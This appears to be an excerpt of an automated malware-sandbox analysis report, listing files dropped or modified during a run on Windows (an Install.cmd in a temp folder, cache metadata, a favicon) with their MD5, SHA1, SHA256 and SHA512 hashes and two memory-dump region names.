memory/868-246-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSBA69.tmp\Install.cmd
| MD5 | a3c236c7c80bbcad8a4efe06a5253731 |
| SHA1 | f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07 |
| SHA256 | 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d |
| SHA512 | dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\favicon[1].png
| MD5 | 18c023bc439b446f91bf942270882422 |
| SHA1 | 768d59e3085976dba252232a65a4af562675f782 |
| SHA256 | e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482 |
| SHA512 | a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3e7329584175cbc758e7e3abc47bfd76 |
| SHA1 | 2a5cff072407f0686539066dc8f3d4047f81c45a |
| SHA256 | 9384e1553e95a1fac60889b7de3ba45c8f73b7a69e89b649550ad817106185d2 |
| SHA512 | 9d8ced048858a9b74a7a945c50281867c116c43a3437b51168bf61660ab448001f30275dc800741892c6447651da54a4ccb4f7967330df930f2c0962dc62030f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 434577d3d07c08cd087ab920d81f4071 |
| SHA1 | de405aa83c5b09a2516c137e73931d70dc6b36db |
| SHA256 | 5cbc2e66ae51d37f8b60038d286fae0f2a256ee3a258569298e2da582a51fb9c |
| SHA512 | fd45225ff66a8da2ad9769c930593eed034817ad119c0a261148caee2c49cdae78eb604b9f6ea0c2caeadebde723348347146785c4084ef1c8f9c521d20b2b10 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 836313218eaf8d2ce9f0c06496b6da89 |
| SHA1 | 38ff7f78fe08c344f23b5a814965f1af87bdf09e |
| SHA256 | caab9e5d39069eec471855ab39ff0a655f7328a46dce5e48b0ddad93a1169cd0 |
| SHA512 | 86fdff68aa7ecda6428bc37f85f4319fd28689881628fa42e8fe1af3b51fe6880f16320d9054c7182afe196a031a721f233e77ff270e8972caa98c915cf1606a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3c0d6c7b3adfa3f3d8a6a96d5569c0b6 |
| SHA1 | 5b7d338acb8444db8d60460a98430b3eb2d74871 |
| SHA256 | 4ec6a12ca3ed5b81276724974c1e98a4962fc9a0f22522d1133a82e136ff8020 |
| SHA512 | 0971a178fc3c0336fdf9ad1dc55cd6ef8233078a2f61c094f69019163635d9b5ce10bd0fd339858cc395661f42db716a37181e4a21dee0e424b50aca7f40fc1d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ad443acde060ab1a1238cb82766dc300 |
| SHA1 | f5d2284bb7ca93f38a827606592a4fc2f4650cff |
| SHA256 | a8081a72eb7dab7eb2daa270211614b5a5fb7013b2a667804cf6f43b7b925a86 |
| SHA512 | 28bc0a1a4638ecf37436bee260e7b48b8accf437dfe47a38b728da0c4c4abb46d05ec24f076fa730b3a9fcc4920aca99e683f7c45ca70da62063cdc5117f2393 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | d7a9ea27ca1c01b7a92aa446b93510c7 |
| SHA1 | 5afdcb45bd5ed2228f35fb659373de8fb207aefc |
| SHA256 | a660b13139d7e458b7033054ab04aa0030a51ac405b448a455787e36f86a38aa |
| SHA512 | b84f9cbf0e6afd64797f289fb6d846d9a92dcd12f0f477c940e347e5220b9466535f78824010d5cda9e2a8a4b6621d1cd19553973e1842fefa2971094e3eeb46 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 75ba1a9531c1dc5eb48264657c726fb4 |
| SHA1 | bb7919dd5da463636cc463107105e38cc42105ec |
| SHA256 | c8eb1841aa40eeeb6721f256e16f12e809d72f23946f632fc5bd9994681bfd1c |
| SHA512 | d2b3b3f5dd6746294e40d000cd979931bb35956a1ce2973c64c5d330a2bd29553203cc7a715e027140abdcb8c2a769a1bc9573b5ba853b27bc1d5dc0086b8bf2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3a02ed9061469b2bbf59dd574e234b7f |
| SHA1 | 12fb2ae7f2ad90effb6faf88b5361248e458c91e |
| SHA256 | 2d0e6e6c260f688363edf3fb5c579d25eb1641aab69713647e518186daef0480 |
| SHA512 | e48b6cfa786afc7a320871f87f02886cbcf59ed98e92288f6f1092a041ce8db78a267d64c9ba6373116d6f0808a4fb1f20700ddd7a1510fccd6f89fcc440e1ea |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9d3aeda873ddb7aa9bac38077365fdde |
| SHA1 | 71584b74b6fc809dfc561da4912f87320e9e7a37 |
| SHA256 | e57c7b8d27adbf2d1e909b4b50705a7fd3c425ea4ed60a0842ccd20a65829073 |
| SHA512 | b2b9e01b4ed2baa4e0f863a50ec269dd9eb713b21afc079d7d0658feba4091937cfbdbe0108857bc4938861663519f0e945551dad74bedb43d9d25abe69f34b1 |
memory/692-778-0x000000013F3A0000-0x000000013F3A6000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 40f0bdae7c15f8265c8483a8e86b6a53 |
| SHA1 | e6c0f2b36bba39022f479e53fa553b6b65dd1457 |
| SHA256 | 442a8e6a9dcd5187542f3e3305aff6af68c5c7e5fdc44159e632aaafc53aa945 |
| SHA512 | 10c45af49a2786e61cee8983b3c2e21f09c05cd7932cdbce6d32cf69158e268b7958209435d3e6d34c4b559da4d7fa352846f6b4cad48f145d9df39ab5235a4a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 52fb5a2496b66b6fa9f08f70675c5ace |
| SHA1 | 9bd89b9d7d09a2f6f45f4fe8b496283c3c81d59c |
| SHA256 | 2dd68a16d3e92c626682aaa2d1b76b8c5950ac532ced1011cb2d3594af7ad5ad |
| SHA512 | 5e6137157f234caa82d3e3df73a2c1fcf40cf6371e1e4a67f6b5822a1a48ba9780225a43668961be7bd379b94dfcd2161b8ef9d7dcecad22f50f224807b50961 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a805c8fc9ffe0e0529b3727e6e473b06 |
| SHA1 | 5f571e6923283310b7508a0ea462027cfbf1da1f |
| SHA256 | d4a67ea79d767efb67d45dd8569897e39c7c1eb51ffc4352dc3a6fee1849df80 |
| SHA512 | 1d9fb75d8b9c684ac7b718bf2b790c1e5b6aba63e734a5b7878b63d79559084d5d6353769a61bc18e90a2fc83bddb2082d0b8f4d0496a1b50442f2ad963eb8e4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7963f098763d48e797add104eef7038b |
| SHA1 | cefe6adea2c4a324c0f96f2db369f16d9d78a0f9 |
| SHA256 | 7e7d740f36d2a33192e4eb33e38207ed3f307599399c9b7010a71d1582e5a932 |
| SHA512 | 5062989676ac17d490b4e3ff8bd005bebaea4968642f683f5abf38501c9a7908ec4bb91b6d553f02b743c6f5d29b8535aa1a58e61654542a9b829985e0e6e48e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8609a36f422f530aee8e51d163c8df63 |
| SHA1 | a929b762f9b893a8fc55cb40916e22b63e236c3f |
| SHA256 | 498cfe2071271c1bb3bb717f4cdc9a0a7a3911baca64f4bd06debcc5d20c8b7b |
| SHA512 | 9824ad6292b09c11f3acb483d1abf253a9ec069d7e328c61cf87271dbfd867e5f7d674fceadd46e9462c992361c2d2251689e164e4f1f0aed06269e55bcf61e4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 34085e3914f574aebead46fa6e5f1fd6 |
| SHA1 | 4f1c6767d8531a907dcc9f6f6b3059a33c063872 |
| SHA256 | 18ba57c5ff1bfa145716a52e7715818546f89026826e91771b27ea897e070133 |
| SHA512 | b71a6e30af92ae1a7f26af90bb96db15e24b996842bdb3f8877d5a5d527529d10abc35a4d4ddc40ea9183bd60fd45a14a0ed0d53627bfb3de0c36f75425e6ed5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7b6ead6881cd1beaa749b8afbc40f7b4 |
| SHA1 | 105881d84093bad34fd1d49ebbcffffb782ed725 |
| SHA256 | 8deac1a9c56f84999ea70ecb5a81b644114292bc0539191825f776241accc1b8 |
| SHA512 | 1c9288e6da30870f732e2f84c7c4d3d9f5c6fbb573e305109b9d683baff7a9a23fda5f583d9fea4d93542065ff6d66d3d11c4e7ffb7ad05d92a1b9065db79098 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c4519739a0e15209c0e9bcc147823ef4 |
| SHA1 | ab56e2f69327a7a775945f1d33f556be4e2ef0cb |
| SHA256 | 073c0f527f2b63fb93bd54efaae93969b227c6dc203436f42d74707a1af4ac1e |
| SHA512 | d3dcf4e94a5a71165f39e79d35e307f0e3aa2b9f60888fd11a63358505032ac981910e9f6bc5ccd8377c0bca4c9799d4afcdb59b3eb29adc5c8b9d3907c692c1 |